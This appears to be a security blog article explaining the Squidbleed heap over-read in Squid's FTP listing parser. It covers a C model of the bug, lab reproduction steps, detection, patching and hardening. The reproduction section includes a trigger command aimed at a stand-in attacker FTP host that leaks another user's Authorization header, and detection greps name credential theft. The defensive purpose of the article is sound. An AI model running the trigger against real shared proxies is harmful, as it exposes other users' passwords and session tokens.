
Introduction:
A parser bug introduced in 1997 is still haunting the widely deployed Squid web proxy, enabling attackers with shared proxy access to leak another user’s cleartext HTTP requests—including passwords, session tokens, and API keys. Dubbed Squidbleed (CVE-2026-47729), this Heartbleed-style heap over-read vulnerability affects default Squid configurations across corporate networks, schools, and public Wi-Fi hotspots, turning trusted proxy users into potential data siphoners.
Learning Objectives:
- Understand the technical root cause of the Squidbleed vulnerability and its 29-year journey from introduction to discovery.
- Learn how to identify vulnerable Squid deployments and assess exposure in shared proxy environments.
- Master practical mitigation strategies, including patching, configuration hardening, and FTP protocol disablement.
Anatomy of the Squidbleed Vulnerability: How a 1997 Parser Bug Leaks Memory
The Squidbleed vulnerability resides in Squid’s FTP directory-listing parser, specifically within the code that handles legacy NetWare server responses. When processing FTP `LIST` output, Squid attempts to skip whitespace using a loop that calls `strchr(w_space, *copyFrom)`. If an attacker-controlled FTP server sends a listing line that ends abruptly after the timestamp with no filename, so that `copyFrom` lands precisely on the string’s null terminator, `strchr` treats that terminating NUL as part of the searchable string and returns a pointer instead of NULL. The loop therefore does not stop at the terminator: it walks off the end of the buffer, and `xstrdup` copies whatever follows, potentially another user’s uncleared HTTP request, back to the attacker as a “filename”.
Squid reuses freed memory buffers without zeroing them, so a 4KB buffer that recently held a victim’s HTTP request still retains most of its content. A short FTP response overwrites only the first few bytes; the over-read returns the remainder, including `Authorization` headers, session cookies, and API keys. This attack requires the attacker to control an FTP server reachable through the proxy on port 21 (FTP support is enabled in Squid by default) and to have trusted access to the same Squid proxy, a plausible scenario in shared environments.
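To make the parser defect concrete, here is an added stand-alone C model of the whitespace-skip loop beside its hardened form; it is constructed for this article and is not Squid's source, so the `w_space` contents, the sample listing line and the stale request bytes are all assumed.

```c
#include <string.h>

/* Whitespace set under the name Squid uses; its contents are assumed here. */
static const char w_space[] = " \t\r\n";

/* Buggy skip: strchr(w_space, '\0') matches w_space's own terminator, so the
 * NUL ending the line counts as whitespace and the loop walks past it.  The
 * arena_len bound exists only to keep this demo defined; Squid's loop had none. */
static size_t skip_ws_buggy(const char *arena, size_t arena_len, size_t pos)
{
    while (pos < arena_len && strchr(w_space, arena[pos]) != NULL)
        pos++;
    return pos;
}

/* Hardened skip: test for the terminator before consulting strchr. */
static size_t skip_ws_fixed(const char *arena, size_t arena_len, size_t pos)
{
    while (pos < arena_len && arena[pos] != '\0' && strchr(w_space, arena[pos]) != NULL)
        pos++;
    return pos;
}

/* Constructed sample of a reused, never-zeroed buffer: stale bytes of an earlier
 * HTTP request, then a short LIST line (timestamp, no filename) over the start. */
enum { ARENA_LEN = 96 };
static size_t make_arena(char *arena)          /* returns index of the line's NUL */
{
    static const char stale[] = "GET http://intranet/ HTTP/1.1\r\n"
                                "Authorization: Basic dXNlcjpwYXNz\r\n";
    static const char line[] = "-rw-r--r-- 1 0 0 0 Jan 1 12:34 ";
    memset(arena, 0, ARENA_LEN);
    memcpy(arena, stale, sizeof stale - 1);   /* left behind by the last user */
    memcpy(arena, line, sizeof line);         /* short response, NUL included */
    return sizeof line - 1;
}

/* Bytes past the terminator where each loop stops when started on the sample
 * line's trailing space: 0 for the fixed loop, more than 0 for the buggy one. */
static size_t overread_on_sample(int buggy)
{
    char arena[ARENA_LEN];
    size_t nul = make_arena(arena);
    size_t end = buggy ? skip_ws_buggy(arena, ARENA_LEN, nul - 1)
                       : skip_ws_fixed(arena, ARENA_LEN, nul - 1);
    return end - nul;
}
```

On this sample `overread_on_sample(1)` returns 1 and `overread_on_sample(0)` returns 0: the buggy loop has already stepped into the stale request bytes, which is exactly where Squid's `xstrdup` then starts copying.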
Step-by-Step: Reproducing the Squidbleed Memory Leak
To understand the vulnerability, security researchers can set up a controlled lab environment:
1. Deploy a vulnerable Squid instance (versions prior to 7.6 or 8.0) with default configuration:
   sudo apt-get install squid=5.7-0ubuntu0.1   # example vulnerable version
   sudo systemctl start squid
2. Set up a malicious FTP server that responds with a crafted `LIST` output—a line ending immediately after the timestamp with no filename, triggering the `strchr` off-by-one.
3. Simulate a victim sending an HTTP request through the proxy:
   curl -x http://proxy-ip:3128 -H "Authorization: Basic dXNlcjpwYXNz" http://example.com/
4. Trigger the vulnerability from an attacker’s position by requesting a directory listing from the malicious FTP server:
   curl -x http://proxy-ip:3128 ftp://attacker-ftp-server/
5. Observe the leaked data in the FTP response—the `xstrdup` call returns a string containing fragments of the victim’s HTTP request, including the `Authorization` header.
Identifying Vulnerable Squid Deployments: Version Detection and Exposure Assessment
The vulnerability affects all Squid versions from 1997 until the patched releases (7.6 and 8.0). Organizations must inventory their Squid deployments and assess exposure. Default configurations are vulnerable, and FTP support is enabled by default.
Step-by-Step: Vulnerability Assessment Commands
1. Check Squid version:
   squid -v | grep "Squid Cache: Version"
   Versions below 7.6 or 8.0 are vulnerable.
2. Verify FTP support—check whether FTP is enabled in squid.conf:
   grep -i "ftp" /etc/squid/squid.conf
   Look for `ftp_user` or `ftp_passive` directives; FTP is typically on by default.
3. Test for the vulnerability without a full exploit—send a crafted FTP `LIST` request and monitor logs:
   tail -f /var/log/squid/access.log | grep "ftp"
   Unusual `ERR_INVALID_URL` or malformed responses may indicate the parser is mishandling input.
4. Scan for exposed Squid proxies in your environment:
   nmap -p 3128,8080 --open --script=http-squid-version <target-net>
5. Review access controls—verify that only trusted clients can reach the proxy:
   grep -E "http_access|acl" /etc/squid/squid.conf
Mitigation Strategies: Patching, Hardening, and FTP Disablement
The most effective mitigation is upgrading to Squid version 7.6 or 8.0, which includes the fix merged in April 2026. However, many organizations run custom or distribution-specific builds; simply checking the version is insufficient—administrators must verify the presence of the guard in FtpGateway.cc.
Step-by-Step: Patching and Hardening
1. Upgrade via package manager (Ubuntu/Debian):
   sudo apt-get update
   sudo apt-get install squid=7.6-   # or newer; complete the version string for your distribution
   sudo systemctl restart squid
2. For source installations, clone the patched repository and build:
   git clone https://github.com/squid-cache/squid.git
   cd squid
   git checkout SQUID_7_6
   ./configure --prefix=/usr/local/squid
   make && sudo make install
3. Verify the fix by checking `FtpGateway.cc` for the corrected `strchr` logic:
   grep -C 1 "strchr" /path/to/squid/src/FtpGateway.cc
   The guard should now properly handle null terminators.
4. Disable FTP entirely—the cleaner, recommended mitigation:
   echo "ftp_port 0" >> /etc/squid/squid.conf
   echo "acl FTP proto FTP" >> /etc/squid/squid.conf
   echo "http_access deny FTP" >> /etc/squid/squid.conf
   systemctl restart squid
   Because `http_access` rules are evaluated in order and the first match wins, place the deny rule before any `http_access allow` that would otherwise match your clients rather than relying on a line appended at the end of the file.
5. For Windows environments using Squid via Cygwin or WSL, apply the same configuration changes and verify with:
   squid -v | findstr "Squid Cache"
Forensic Detection: Identifying Squidbleed Exploitation in Your Logs
While no in-the-wild exploitation has been reported as of writing, proactive monitoring can detect suspicious FTP activity. Attackers must initiate an FTP connection through the proxy to trigger the leak; anomalous FTP requests from internal clients should raise red flags.
Step-by-Step: Log Analysis and Detection
1. Enable detailed logging for FTP transactions in squid.conf:
   debug_options ALL,1 9,9
   access_log /var/log/squid/access.log squid
2. Monitor for FTP `LIST` requests originating from unexpected hosts:
   grep "ftp://.*LIST" /var/log/squid/access.log | awk '{print $3}' | sort | uniq -c
3. Look for unusually long or malformed `filename` fields in FTP responses—these may indicate leaked data being returned:
   grep -E "ftp://.*[A-Za-z0-9+/=]{40,}" /var/log/squid/access.log
4. Set up a SIEM alert for FTP traffic on port 21 from internal clients that do not typically use FTP.
5. Capture and inspect network traffic between the proxy and FTP servers:
   tcpdump -i any port 21 -A -s 0 | grep -iE "authorization|cookie|token"
The AI Discovery Angle: Claude Mythos and the Future of Vulnerability Research
Calif.io researchers discovered Squidbleed with the aid of Anthropic’s Claude Mythos Preview, the model behind Project Glasswing. The AI agent identified the `strchr` quirk almost instantly—the same kind of buried parser bug that AI agents have been surfacing elsewhere, including in FFmpeg. This marks a significant shift in vulnerability discovery: AI can now parse decades-old codebases and pinpoint subtle logic errors that human reviewers might overlook.
Step-by-Step: Leveraging AI for Code Auditing
1. Feed vulnerable code snippets (e.g., the `strchr` loop) into an AI model with a prompt like: “Identify potential buffer over-read vulnerabilities in this FTP parser.”
2. Request static analysis reports—AI can simulate execution paths and highlight off-by-one errors.
3. Use AI to generate test cases that trigger edge conditions, such as null-terminated strings in unexpected positions.
4. Automate regression testing—AI can compare patched vs. unpatched code to ensure the fix addresses all variants.
5. Incorporate AI-assisted code review into CI/CD pipelines for open-source projects like Squid.
The Bigger Picture: Legacy Code, Default Configurations, and Supply Chain Risk
Squidbleed is a cautionary tale about the longevity of legacy code in critical infrastructure. The bug persisted for 29 years because Squid’s FTP parser was rarely touched—FTP usage declined, and the code escaped scrutiny. Default configurations that enable unnecessary protocols (FTP, in this case) amplify risk; disabling FTP is a zero-cost mitigation that removes the attack surface entirely.
What Undercode Says:
- Legacy code is a ticking time bomb. Code written in the 1990s, even in widely used projects, can harbor vulnerabilities that remain undetected for decades. Regular audits and fuzzing are essential.
- Default configurations matter. Squid’s default FTP enablement turned a parser bug into a practical attack vector. Disable unused protocols in production.
- AI is changing the game. The discovery of Squidbleed by an AI model signals a new era in vulnerability research—one where machines can outpace human reviewers in finding subtle logic flaws.
- Patching is not enough. Verify fixes at the code level; distribution backports may vary. Confirm the guard in `FtpGateway.cc` before assuming safety.
- Shared proxies are high-risk environments. In schools, offices, and public Wi-Fi, one malicious user can compromise the privacy of all others. Implement strict access controls and consider per-user authentication.
Analysis: The Squidbleed vulnerability highlights systemic issues in open-source maintenance: underfunded projects, reliance on volunteer contributors, and the tendency to leave “working” code untouched. The AI-assisted discovery is both a warning and an opportunity—automated tools can now find these bugs, but they also lower the barrier for attackers. Organizations must adopt a defense-in-depth strategy: disable unused protocols, enforce HTTPS (which is not vulnerable), and segment proxy users to limit the blast radius. The CVSS score of 6.5 (moderate) understates the real-world impact in shared environments, where a single leaked session token could lead to account takeover.
Prediction:
- +1 AI-assisted vulnerability discovery will become standard practice, reducing the average time to find legacy bugs from decades to days. Expect a wave of similar findings in other long-lived projects.
- -1 Attackers will increasingly target shared proxies and caching infrastructure, as these often lack robust authentication and are deployed in permissive configurations.
- +1 The Squid project will likely implement stricter default configurations in future releases, disabling FTP and other legacy protocols by default.
- -1 Organizations that delay patching or fail to disable FTP will remain exposed; the public PoC lowers the barrier for script kiddies to exploit this in shared environments.
- +1 The use of AI in cybersecurity will accelerate both offensive and defensive capabilities, leading to an arms race that ultimately benefits well-resourced defenders.
Reported By: Mohit Hackernews – Hackers Feeds